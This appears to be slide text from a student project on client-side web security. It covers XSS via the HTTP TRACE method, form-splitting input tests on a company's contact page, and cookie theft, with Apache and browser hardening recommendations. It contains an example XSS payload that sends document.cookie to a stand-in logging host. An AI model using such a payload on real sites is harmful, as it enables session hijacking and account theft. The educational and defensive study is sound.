“Client-site security” :“Client-site security” Project Guide Dr. Anurika Vaish By:- Sushil Rai IMS2007032


Goal of the Project :Goal of the Project This Project aims to find out the vulnerabilities on client site and perform the analysis in respect of secure client communication. This project also include the analysis of vulnerabilities on client site due to diligence and misconfiguration on client-server and also provide all kind of required recommendations to protect the client from attackers.


Tools and platform :Tools and platform Tools : Wireshark 1.0 Platform: Linux/Windows Web server : Apache


Domains of Network Security :Domains of Network Security Domains of Network Security


Finding Vulnerabilities……. :Finding Vulnerabilities……. To find out the security loopholes I had applied two approaches which are as follows- Inserting input arguments (in form of script) in the address bar. Insert false parameter values in that input form value.


Algorithm to find XSS- :Algorithm to find XSS- Using TRACE method. Insert false parameter values in that input form value. TRACE method is basically used for an input data ECHO mechanism for HTTP protocol. TRACE request is send to web server which support TRACE method, then web server will send back the result which contains requested information approached by user.


Snap-shot by wireshark 1.0.0 :Snap-shot by wireshark 1.0.0


Now attacker can send the script to get respond from Trace method- :Now attacker can send the script to get respond from Trace method-


Recommendation- :Recommendation- To disable the TRACE method system administrator needs to be added somewhere in your main apache config file outside of any host or directory config. RewriteEngine On RewriteCond % {REQUEST_METHOD} ^TRACE RewriteRule .* - [F]


VULNERABILITY AGAINST FORM SPLITTING: :VULNERABILITY AGAINST FORM SPLITTING: Basically in this method we try to search the input points and pass the invalid inputs and check whether server is accepting it or not. If any invalid input is accepting by web server then that particular web application is vulnerable. I start navigation on pages of RIL one by one , but I was not getting any these kind of input fields but before ending of navigation I stick at last page which was CONTACT US, in this page 14 input fields as we can see it in below given snapshot


Inserting malicious code as input- :Inserting malicious code as input-


Malicious code is accepted by server- :Malicious code is accepted by server-


Recommendations- :Recommendations- To protect an application from form-splitting attack we have to do – 1. Validation of all TCP headers. 2. Validation of all stored cookies. 3. Checking of all query strings. 4. Validation of all form fields. 5. Checking of all hidden fields.


Stealing cookies- :Stealing cookies- Basically cookie stealing is one of the dangerous kind of attack which can be impose on client site by an attacker. Steps are – Finding a XSS vulnerability. Creating cookie stealer script. Logging the cookie like – http://www.xyz.com/search.php?query=”>location.href=’http://abc.com/log.php?12386’+document.cookie;


Cookie in plain alpha-numeric form- :Cookie in plain alpha-numeric form-


Recommendations- :Recommendations- 1.Implementation of cookie timeout. 2. The proper authentication of cookie credentials must be associated to an IP address. 3. We must provide proper availability of log-out functions. 4. Do not store cookies in form of plain text. 5. Do not store weekly encrypted passwords in cookies.


Web browser based Security :Web browser based Security To protect the web browser we have to make some settings which are given below- Select “ask me every time before accepting cookie from web site”. Select “ warn me when sites try to install plug ins”. Disable the check box of “ enable JavaScript” and “enable java”. Disable all check boxes of “ advance JavaScript settings”


: Thank You !!